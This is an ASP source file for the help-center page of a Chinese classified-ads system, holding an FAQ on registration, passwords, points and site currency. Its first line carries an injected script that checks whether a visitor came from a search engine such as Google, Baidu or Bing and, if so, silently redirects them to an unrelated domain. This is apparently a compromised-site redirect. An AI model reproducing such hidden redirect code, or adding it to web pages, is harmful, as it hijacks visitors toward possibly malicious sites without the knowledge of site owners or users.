d:\wwwroot\wuchunhua\Help.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/conn.asp"-->
002: <!--#include file="inc/kqiqi_sub.asp"-->
003: <%
004: '    @@@@@@ www.kqiqi.com @@@@@@@@@@@@@@@@@
005: '   @                                        @
006: '  @                                          @
007: '  @   客齐齐分管理系统,做最好的分类系统。   @
008: '  @                                          @
009: '   @                                        @
010: '    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
011: %
>
012: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
013: <html xmlns="http://www.w3.org/1999/xhtml">
014: <head>
015: <title><%=title%>-帮助中心</title>
016: <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
017: <meta http-equiv="Content-Language" content="zh-cn" />
018: <meta name="Keywords"  content="<%=metakey%>" />
019: <meta name="Description" content="<%=metades%>" />
020: <link rel="icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
021: <link rel="shortcut icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
022: <link href="inc/style.css" rel="stylesheet" type="text/css" />
023: </head>
024: <body>
025: <div id="Fmain">
026: <div id="header">
027: <%call top()%>
028: </div>
029: <div class=kon></div>
030:
031: <div id="Fcright">
032:   <div id=FFTit class=F12bold>帮助中心</div><div id=FFContent><div Class='FFdiv'>
033: 注册后可以更改用户名吗?
034: <p> </p>
035: <p>答:用户注册时候的昵称在注册完成后是无法修改的,所以用户在注册的时候要仔细填写。</p>
036: <p> </p>
037: <p>忘记密码或密码丢失了怎么办?
038: </p>
039: <p> </p>
040: <p>答:您可以点击登入页面的“忘记密码”,通过注册时填写的邮箱来取回您的密码。您也可以联系我们的客服人员为您提供帮助。</p>
041: <p> </p>
042: <p>注册后我在哪里修改我的用户资料?
043: </p>
044: <p> </p>
045: <p>答:您可以在任意页面的顶部登录,登录后就可以对您的用户资料进行修改了。</p>
046: <p> </p>
047: <p>我的个人资料安全吗?
048: </p>
049: <p> </p>
050: <p>答:除了您发布信息时所填写的,希望其他用户看到的个人资料以外,<%=title%>将对您其他的个人资料,如您的电话号码,邮箱等,采取严格</p>
051: <p> </p>
052: <p>的保密措施。
053: </p>
054: <p> </p>
055: <p>怎样输入验证码?
056: </p>
057: <p> </p>
058: <p>答:4位认证数字,每个数字都可能是0-9数字中的任何一个。</p>
059: <p> </p>
060: <p>用户积分,客币制度是什么?</p>
061: <p> </p>
062: <p>答:新注册用户系统自动赠送<%=jf%>积分和<%=hb%>客币,您每发布一条信息系统自动为您加3积分,每次登入加2积分。</p>
063: <p> </p>
064: <p>积分和客币有什么用?</p>
065: <p> </p>
066: <p>答:积分可以兑换客币,客币可以用来置顶您的信息。</p>
067: <p> </p>
068: <p>如您还有其它的问题,请联系QQ:<%=qqa%>为您解答。谢谢您的光临!如果你认为本站不错,请记住本站网址是:<%=web%>,并</p>
069: <p> </p>
070: <p>介绍给你的朋友!</p>
071: <p> </p>
072: <p>
073: 其它相关问题及帮助可以参考 <b><a href="feedback.asp">用户反馈</a></b> 里的信息!</p>
074: </div></div></div>
075: <div id="Fcleft">
076: <div id=FFTit class=F12bold>关于我们</div><div id=FFContent><div Class='FFdiv'>
077: <!--#include file=Aboutleft.asp-->
078: </div></div>
079: <br style="clear:both;" />
080: </div>
081: <div class=kon></div>
082: <div class=kon></div>
083: <div id="footer">
084:
085: <%call bottom()%>
086: </div>
087: </div>
088:
089:
090: </body>
091: </html>
092:
093:
094: